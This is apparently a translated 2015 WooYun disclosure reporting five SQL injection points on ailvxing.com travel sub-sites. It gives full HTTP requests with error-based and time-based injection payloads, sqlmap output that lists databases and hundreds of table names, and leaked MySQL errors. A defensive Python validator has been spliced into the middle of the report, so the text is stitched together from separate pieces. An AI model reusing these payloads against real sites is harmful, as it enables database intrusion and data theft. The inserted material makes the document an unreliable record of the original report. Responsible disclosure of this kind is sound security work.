
Vulnerability summary

Defect ID: wooyun-2015-0148407

Title: Five SQL injections across 爱旅行网 (ailvxing.com) sub-sites, bundled

Affected vendor: 爱旅行网

Author: 路人甲

Submitted: 2015-10-23 09:23

Fixed: 2015-12-07 09:48

Published: 2015-12-07 09:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-23: Details reported to the vendor, awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and domain experts
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public

Brief description:

See title.

Detailed description:

1. Site gti.ailvxing.com, parameter askid

GET /e/ask/getInfo.php?enews=getreply&askid= HTTP/1.1
Referer: http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: gti.ailvxing.com
Cookie: dicvacst34=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst61=EmpireCMS_stats;
dicvacst60=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst58=EmpireCMS_stats;
dicvacst55=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst62=EmpireCMS_stats;
dicvalastsearchtime=1445404741; dicvamybuycar=%7C36%2C196%7C%7C1%21%7C86%2C6%7C%7C1%21%7C32%2C271%7C%7C1%21%7C110%2C440%7C%7C1%21; dicvareturnurl=http%3A%2F
%2Fgti.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=olt6q5223euuecur6udl37h820
Accept-Encoding: gzip, deflate
---
Place: GET
Parameter: askid
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: enews=getreply&askid=-2174 OR (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x716c6f6371,(SELECT (CASE WHEN (7745=7745) THEN 1 ELSE 0 END)),0x7179627271,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[04:05:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
[04:05:45] [INFO] fetching database names
[04:05:46] [INFO] the SQL query used returns 3 entries
[04:05:46] [INFO] resumed: information_schema
[04:05:46] [INFO] resumed: ailvxing2015
[04:05:46] [INFO] resumed: test
available databases [3]:
[*] ailvxing2015
[*] information_schema
[*] test


2. Site hanchao.ailvxing.com, two injection points
askid parameter

GET /e/ask/getInfo.php?enews=getreply&askid=' HTTP/1.1
Referer: http://hanchao.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hanchao.ailvxing.com
Cookie: dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats;
dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats;
dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats;
dicvalastsearchtime=1445410355; dicvamybuycar=%7C70%2C27%7C%7C1%21%7C32%2C273%7C%7C1%21%7C82%2C557%7C%7C1%21%7C24%2C366%7C%7C1%21%7C77%2C11%7C%7C1%21;
dicvareturnurl=http%3A%2F%2Fhanchao.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=is9f01madkpa84jt1808e0lpm7
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 301
Content-Type: text/html; charset=utf-8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by newstime asc' at
line 1<br>select id,classid,userid,replytext,diggtop,digger,newstime from ***_ecms_ask_reply where askid=&#039; order by newstime asc


subid parameter

GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hanchao.ailvxing.com/info-36-124-0.html
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: hanchao.ailvxing.com
Cookie: dicvacst114=EmpireCMS_stats; dicvacst116=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst36=EmpireCMS_stats; dicvacst35=EmpireCMS_stats;
dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats;
dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats;
dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:51:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 240
Content-Type: text/html; charset=utf-8
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1<br>select
id,text,sample from ***_ecms_visa_subdata where id=340+benchmark(20000000,sha1(1))+


3. qyer.ailvxing.com, parameters askid and subid

GET /e/ask/getInfo.php?enews=getreply&askid='


4. xianlvke.ailvxing.com, parameters askid and subid

GET /e/ask/getInfo.php?enews=getreply&askid='


5. qy.ailvxing.com

GET /e/visa/index.php/?enews=showsample&subid=5
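Added example (not part of the original report, and not EmpireCMS code): every affected endpoint above treats askid and subid as integer row ids, so a strict integer check on those parameters would have rejected each reported request, and the responses shown also leak the full MySQL error text, which a defender can flag separately. The log lines below are constructed from the requests in the report; the path-to-parameter map is an assumption about these endpoints.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed: which query parameters each affected endpoint uses as integer ids.
INT_PARAMS = {
    "/e/ask/getInfo.php": {"askid"},
    "/e/visa/index.php/": {"subid"},
}

# Verbose MySQL error text that the responses in the report echo back,
# together with the executed statement.
SQL_ERROR_SIGNATURE = "You have an error in your SQL syntax"


def check_request(request_line):
    """Return findings for one 'METHOD target [HTTP/x]' request line."""
    fields = request_line.split()
    if len(fields) < 2:
        return ["malformed request line: %r" % request_line]
    parts = urlsplit(fields[1])
    expected = INT_PARAMS.get(parts.path)
    if expected is None:
        return []  # endpoint not in scope of this check
    findings = []
    # parse_qsl percent-decodes, so subid=340%2bbenchmark(...) is inspected decoded.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in expected and not re.fullmatch(r"[0-9]+", value):
            findings.append("%s: non-integer value %r" % (name, value))
    return findings


def check_response(body):
    """Flag a response body that leaks the database error and the SQL statement."""
    if SQL_ERROR_SIGNATURE in body:
        return ["response leaks MySQL error text; disable error display on the web tier"]
    return []


# Constructed request lines modelled on the ones in the report.
SAMPLE_REQUESTS = [
    "GET /e/ask/getInfo.php?enews=getreply&askid=12 HTTP/1.1",   # well-formed id
    "GET /e/ask/getInfo.php?enews=getreply&askid= HTTP/1.1",     # blank id
    "GET /e/ask/getInfo.php?enews=getreply&askid=' HTTP/1.1",    # stray quote
    "GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line, "->", check_request(line) or "ok")
```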

Proof of vulnerability:

Database: ailvxing2015
[416 tables]
+----------------------------------+
| alx_alx_accitem |
| alx_alx_acckemu |
| alx_alx_agent |
| alx_alx_booking |
| alx_alx_cardname |
| alx_alx_cardname_log |
| alx_alx_ddlog |
| alx_alx_finance |
| alx_alx_finance_log |
| alx_alx_mailtemp |
| alx_alx_sendmail |
| alx_alx_sendmail_check |
| alx_alx_smsreply |
| alx_alx_smssend |
| alx_alx_smssend_check |
| alx_alx_smstemp |
| alx_alx_tixing |
| alx_alx_user_finance |
| alx_alx_user_info |
| alx_alx_user_pay |
| alx_ecms_article |
| alx_ecms_article_check |
| alx_ecms_article_check_data |
| alx_ecms_article_data_1 |
| alx_ecms_article_doc |
| alx_ecms_article_doc_data |

Fix recommendation:

Copyright: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-23 09:46

Vendor reply:

Will handle it right away, thanks!

Latest status:

None yet